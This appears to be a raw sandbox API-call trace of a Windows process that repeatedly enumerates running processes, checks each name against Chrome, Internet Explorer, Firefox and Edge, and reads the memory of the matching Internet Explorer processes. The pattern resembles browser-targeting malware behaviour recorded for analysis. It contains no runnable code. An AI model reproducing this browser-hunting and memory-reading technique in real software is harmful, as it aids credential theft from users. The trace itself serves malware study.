	[0211.470] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0211.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.470] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.471] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0211.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.471] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0211.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3aac
	[0211.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.472] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0211.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.473] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.474] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0211.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.474] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.475] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0211.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3ab0
	[0211.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.476] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0211.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.476] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.476] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0211.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.477] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.477] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0211.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3ab4
	[0211.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.478] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0211.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.479] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.479] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0211.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.480] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.481] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0211.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3ab8
	[0211.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.481] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0211.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.482] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.482] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0211.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.483] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.483] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3abc
	[0211.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.484] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.484] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.484] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.485] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.485] NtQueryInformationProcess (in: ProcessHandle=0x3abc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.485] ReadProcessMemory (in: hProcess=0x3abc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.485] ReadProcessMemory (in: hProcess=0x3abc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.485] ReadProcessMemory (in: hProcess=0x3abc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.485] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3ac0
	[0211.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.486] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.487] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.487] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.487] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.487] NtQueryInformationProcess (in: ProcessHandle=0x3ac0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.487] ReadProcessMemory (in: hProcess=0x3ac0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.487] ReadProcessMemory (in: hProcess=0x3ac0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.488] ReadProcessMemory (in: hProcess=0x3ac0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.488] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3ac4
	[0211.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.489] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.489] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.489] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.490] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0211.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3ac8
	[0211.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.491] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0211.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.491] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.491] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0211.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.492] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3acc
	[0211.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.493] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.493] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.493] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.494] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.494] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.494] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3ad0
	[0211.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.495] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.496] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.496] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.496] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.496] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0211.497] CloseHandle (hObject=0x188) returned 1
	[0211.497] Sleep (dwMilliseconds=0x64) 
	[0211.599] GetCurrentProcessId () returned 0x110
	[0211.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0211.605] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0211.607] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0211.609] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0211.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3ad4
	[0211.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.611] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.612] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.612] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.613] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.613] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3ad8
	[0211.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.614] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.614] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.622] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.622] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.622] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0211.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3adc
	[0211.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.623] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0211.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.623] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.624] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0211.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.624] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.624] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3ae0
	[0211.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.625] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.625] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.626] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.626] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.626] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0211.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3ae4
	[0211.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.627] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0211.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.627] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.628] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0211.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.628] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.628] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0211.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3ae8
	[0211.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.629] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0211.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.629] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.630] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0211.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.630] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.630] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0211.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3aec
	[0211.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.631] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0211.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.631] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.632] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0211.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.632] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.632] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0211.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3af0
	[0211.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.633] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.633] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.633] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.634] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.634] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3af4
	[0211.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.635] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.635] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.635] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.636] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.636] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3af8
	[0211.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.637] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.637] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.637] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3afc
	[0211.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.639] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.639] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.639] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.639] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
